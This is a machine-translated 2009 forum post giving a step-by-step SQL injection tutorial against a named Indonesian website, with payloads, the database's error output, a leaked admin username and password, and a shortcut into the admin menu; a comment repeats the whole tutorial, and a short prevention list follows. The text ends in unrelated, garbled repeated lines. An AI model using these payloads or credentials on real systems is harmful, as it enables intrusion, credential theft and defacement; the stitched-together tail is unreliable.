Nuk endang

solikin sub
agung
Breaking the Web with Step-by-Step SQL Injection
Submitted by ArBoy on Sun, 18/10/2009 - 15:54

Until March 2006, there is still a web site in the Republic of Indonesia is broken with SQL Injection
techniques. You know how dangerous this one bug? Here we will present step by step SQL Injection is
directly taken from the writings iko (iko94@yahoo.com)

Note: we will limit discussion on SQL Injection in MS-SQL Server.

We'll take the example of site-www.pln wilkaltim.co.id

There are two weaknesses in this site, namely:

1. Table News
2. Table Admin

The first step, we determine which holes can be inject

the road to walk (Enumeration) they will be used on site.
We will find a way 2 model input parameters, namely by
I enter through the input box and put it through
URL address.

We take the easiest first, by way of the input box. Then we search box for admin login.
Found in www.pln-wilkaltim.co.id/sipm/admin/admin.asp
The first step to determine the table name and fieldnya,
we inject NIP box with the command (the password is up, let the branch aja): 'having 1 = 1 --
do not forget to write the single quotes and double hyphens (important).
The second meaning can be a sign they will be looking at the tutorial SQL Injection
in this www.neoteker.or.id (see archives above).
Then will come out error message:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/ sipm / admin / dologin.asp, line 7
-------
Get out of our first field name!
Write down the name of the table: T_ADMIN
Note the name field: NO

Then we will find the name of the next fields,

along with the table name may vary.
We inject the NIP box (the password is up to):
'Group by T_ADMIN.NOMOR having 1 = 1 --
Going out error messages:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/ sipm / admin / dologin.asp, line 7
-------
This means that the name of the table and our second field.
Note: T_ADMIN.NIP

Then we find the field to three:

'Group by T_ADMIN.NOMOR, T_ADMIN.NIP having 1 = 1 --
Going out error messages:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/ sipm / admin / dologin.asp, line 7
-------
Write down the field to three: T_ADMIN.PASSWORD

Perform the above steps until we find the last field.

Here is the error message occurs, if we check

the last field with her inject:
'Group by T_ADMIN.NOMOR, T_ADMIN.NIP, T_ADMIN.PASSWORD,
T_ADMIN.NAMA, T_ADMIN.KD_RANTING, T_ADMIN.ADDRESS, T_ADMIN.EMAIL
having 1 = 1 --
(note: the sentence must be 1 row, not cut)
-------
- NIP or Password or your unit is wrong!! --
-------
Success! We managed to find the last field.
List of columns (fields):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
There is only one table for this authentication (ie T_ADMIN),
This will further facilitate our process.

The next step, we determine the field-type structure

fields mentioned above.

We inject the box NIP (pass up):

'Union select sum (NO) from T_ADMIN -
The meaning of the query is: we try to apply
sum clause before determining whether the number of columns
the two are similar rowsets.
Language is our easy to enter the clause sum (amount)
applicable to type a numeric field, so to type a column
is not numeric, will be out errors that could tell
we kind of column in question.
Error message:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/ sipm / admin / dologin.asp, line 7
-------
NUMBER column that is numeric type.

Next we inject:
'Union select sum (NIP) from T_ADMIN -
Going out error messages:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum
or average aggregate operation can not take a char data
type as an argument.
/ sipm / admin / dologin.asp, line 7
-------
Means bertype char NIP column.
We must repeat the above command to column
next to the road in nama_kolom change:
'Union select sum (nama_kolom) from T_ADMIN -
with the next column.
We have 7 type column:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

The next step, we will search the contents of password fields,

for user admin, with her inject:
'Union select min (NAMA), 1,1,1,1,1,1 from T_ADMIN where NAME>' a'-
means we choose the minimum user name greater than 'a'
and tried to convert it to type integer.
Meaning the number 1 as 6 times it is that we only choose
NAME column, and ignore the other columns 6.
Going out error messages:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax
error converting the varchar value 'bill' to
a column of data type int.
/ sipm / admin / dologin.asp, line 7
-------
You see:
varchar value 'bill'
'bill' was the name of the user in the last record entered,
or fill in the NAME column the last record inserted.

Next we inject:
'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where
NAME = 'bill' -
note: must be a line (not cut).
Going out error:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax
error converting the nvarchar value 'm @ mpusk @ u' to a
column of data type int.
/ sipm / admin / dologin.asp, line 7
-------
This means that we succeed!
We get
[+] NAME = bill
[+] PASSWORD = m @ mpusk @ u

Please login to:

www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account, was a branch, please
contents itself with trial and error (

Or we use the shortcut it ....

We inject it:
'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMIN
where NAME = 'bill' -
note: must be a single line.
Duarrrrrr ... ... ....
Glhodhak ... ... ... ....
Straight into the admin menu.
Remember: do not make damage! tell the admin!

The second hole is in the news.

Basically there is the news content of the table
another. So can we inject tetep!
The difference is, we must enter the parameters in its URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
no parameters id and idSM.
When we try to inject, it is influential
id parameters aja (CMIIW).

We inject it:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119 'having 1 = 1 --
going out error message:
---------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/ dari_Media.asp, line 58
---------
means 'tb_news.NewsId' is the name of our tables and columns
first.

Repeat the steps above until we get:

tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bits of data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, next is your own work to develop

your knowledge.
You are able to insert the news that you can set yourself
contents.

This is why the holes in MS-SQL Server is so dangerous.

In my estimation, the names of the parties in the Commission website is in hack

by Shizoprenic, also in the tables of a database,
so inaccessible tetep SQL Injection by this.

************************************************** ****
SPECIAL FOR ADMIN & WEB PROGRAMMER!
************************************************** ****
How to prevent common use:
1. Limit the length of the input box (if possible), with
how to limit the program code, so the cracker beginners
will be confused for a moment to see her input box can not in
inject with a long command.
2. Filter input is entered by the user, especially the use of
single quotes (Input Validation).
3. Turn off or hide error messages that came out
from SQL Server is running.
4. Turn off the standard facilities such as Stored Procedures,
Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" using low privilege user
in SQL Server Security tab.

Well that's probably what I can tell you ... ..

It is a picture, how the Internet world is not safe ...
If you want more secure, off your network cable, off the disk
drive, off your hard drive, you kompie sale!
Just kidding:)
Comments
Submitted by ArBoy on Thu, 20/10/2009 - 16:42.
#1
ArBoy's picture
Member since:
17 October 2009
Last activity:
4 weeks 2 days

certainly understand dong ga ...

wkwkwk
--

crazy ..

* Reply

Submitted by anharku on Thu, 20/10/2009 - 13:49.

#2
anharku's picture
Member since:
29 March 2009
Last activity:
2 days 6 hours

wah makasih infonya sql injection

pertamax gan!

* Reply

Submitted by Kholis on Wed, 21/10/2009 - 04:52.

#3
Kholis's picture
Member since:
1 May 2009
Last activity:
4 weeks 5 days

Hahaha

Q Try Now

Website soale Q Not So

Database B

Lately, you often hear the term "SQL Injection"?

You know how dangerous this one bug?
Here we will present step by step this SQL Injection.
Note: we will limit discussion on SQL Injection
in MS-SQL Server.

We'll take the example of site-www.pln wilkaltim.co.id

There are two weaknesses in this site, namely:
1. Table News
2. Table Admin

The first step, we determine which holes can be inject

the road to walk (Enumeration) they will be used on site.
We will find a way 2 model input parameters, namely by
I enter through the input box and put it through
URL address.

We take the easiest first, by way of the input box.

Then we search box for admin login.
Found in www.pln-wilkaltim.co.id/sipm/admin/admin.asp
The first step to determine the table name and fieldnya,
we inject NIP box with the command (the password is up, the branch
let aja):
'Having 1 = 1 --
do not forget to write the single quotation marks and signs
double minus (important).
The second meaning can be a sign they will be looking at the tutorial SQL Injection
in this www.neoteker.or.id (see archives above).
Then will come out error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/ sipm / admin / dologin.asp, line 7
--------------------
Get out of our first field name!
Write down the name of the table: T_ADMIN
Note the name field: NO

Then we will find the name of the next fields,

along with the table name may vary.
We inject the NIP box (the password is up to):
'Group by T_ADMIN.NOMOR having 1 = 1 --
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/ sipm / admin / dologin.asp, line 7
--------------------
This means that the name of the table and our second field.
Note: T_ADMIN.NIP
Then we find the field to three:
'Group by T_ADMIN.NOMOR, T_ADMIN.NIP having 1 = 1 --
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/ sipm / admin / dologin.asp, line 7
--------------------
Write down the field to three: T_ADMIN.PASSWORD

Perform the above steps until we find the last field.

Here is the error message occurs, if we check

the last field with her inject:
'Group by T_ADMIN.NOMOR, T_ADMIN.NIP, T_ADMIN.PASSWORD,
T_ADMIN.NAMA, T_ADMIN.KD_RANTING, T_ADMIN.ADDRESS, T_ADMIN.EMAIL
having 1 = 1 --
(note: the sentence must be 1 row, not cut)
--------------------
- NIP or Password or your unit is wrong!! --
--------------------
Success! We managed to find the last field.
List of columns (fields):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
There is only one table for this authentication (ie T_ADMIN),
This will further facilitate our process.

The next step, we determine the field-type structure

fields mentioned above.

We inject the box NIP (pass up):

'Union select sum (NO) from T_ADMIN --
The meaning of the query is: we try to apply
sum clause before determining whether the number of columns
the two are similar rowsets.
Language is our easy to enter the clause sum (amount)
applicable to type a numeric field, so to type a column
is not numeric, will be out errors that could tell
we kind of column in question.
Error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/ sipm / admin / dologin.asp, line 7
--------------------
NUMBER column that is numeric type.

Next we inject:
'Union select sum (NIP) from T_ADMIN --
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum
or average aggregate operation can not take a char data
type as an argument.
/ sipm / admin / dologin.asp, line 7
--------------------
Means bertype char NIP column.

We must repeat the above command to column

next to the road in nama_kolom change:
'Union select sum (nama_kolom) from T_ADMIN --
with the next column.
We have 7 type column:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

The next step, we will search the contents of password fields,

for user admin, with her inject:
'Union select min (NAMA), 1,1,1,1,1,1 from T_ADMIN where NAME>' a'--
means we choose the minimum user name greater than 'a'
and tried to convert it to type integer.
Meaning the number 1 as 6 times it is that we only choose
NAME column, and ignore the other columns 6.
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax
error converting the varchar value 'bill' to
a column of data type int.
/ sipm / admin / dologin.asp, line 7
--------------------
You see:
varchar value 'bill'
'bill' was the name of the user in the last record entered,
or fill in the NAME column the last record inserted.

Next we inject:
'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where
NAME = 'bill' --
note: must be a line (not cut).
Going out error:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax
error converting the nvarchar value 'm @ mpusk @ u' to a
column of data type int.
/ sipm / admin / dologin.asp, line 7
---------------------
This means that we succeed!
We get
[] NAME = bill
[] PASSWORD = m @ @ u mpusk

Please login to:

www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account, was a branch, please
contents itself with trial and error

Or we just use the shortcut ....

We inject it:
'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMIN
where NAME = 'bill' --
note: must be a single line.
Duarrrrrr ..........
Glhodhak .............
Straight into the admin menu.
Remember: do not make damage! tell the admin!

The second hole is in the news.

Basically there is the news content of the table
another. So can we inject tetep!
The difference is, we must enter the parameters in its URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
no parameters id and idSM.
When we try to inject, it is influential
id parameters aja (CMIIW).

We inject it:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119 'having 1 = 1 --
going out error message:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/ dari_Media.asp, line 58
---------------------------
means 'tb_news.NewsId' is the name of our tables and columns
first.

Repeat the steps above until we get:

tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bits of data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, next is your own work to develop

your knowledge.
You are able to insert the news that you can set yourself
contents.

This is why the holes in MS-SQL Server is so dangerous.

In my estimation, the names of the parties in the Commission website is in hack

by Shizoprenic, also in the tables of a database,
so inaccessible tetep SQL Injection by this.

************************************************** ****
SPECIAL FOR ADMIN & WEB PROGRAMMER!
************************************************** ****
How to prevent common use:
1. Limit the length of the input box (if possible), with
how to limit the program code, so the cracker beginners
will be confused for a moment to see her input box can not in
inject with a long command.
2. Filter input is entered by the user, especially the use of
single quotes (Input Validation).
3. Turn off or hide error messages that came out
from SQL Server is running.
4. Turn off the standard facilities such as Stored Procedures,
Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" using low privilege user
in SQL Server Security tab.

Well that's maybe what I can tell .....

It is a picture, how the Internet world is not safe ...
If you want more secure, off your network cable, off the disk
drive, off your hard drive, you kompie sale!
Just kidding)

Reference:
[] Sqlinjection, www.BlackAngels.it
[] Anvanced sql injection in sql server applications
(www.ngssoftware.com)
[] Sql injection walktrough (www.securiteam.com
eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry again
drinking to pay the debt when the refundable credit, day and night thinking about debt
eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry again
drinking to pay the debt when the refundable credit, day and night thinking about debt

sub edi mugiroh

klaten agung
iskandar marmo
iskandar
eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry again
drinking to pay the debt when the refundable credit, day and night thinking about debt

sub edi mugiroh

klaten agung
iskandar marmo
iskandar
Susilowati agung
ahmadi iksan haris
mugiroh klaten
eat drink married to
assistant cook in
charge of cleaning the
room cleaned cooked
meals to marry again
drinking to pay the
debt when the
refundable credit, day
and night thinking
about debt
sub edi mugiroh
klaten agung
iskandar marmo
iskandar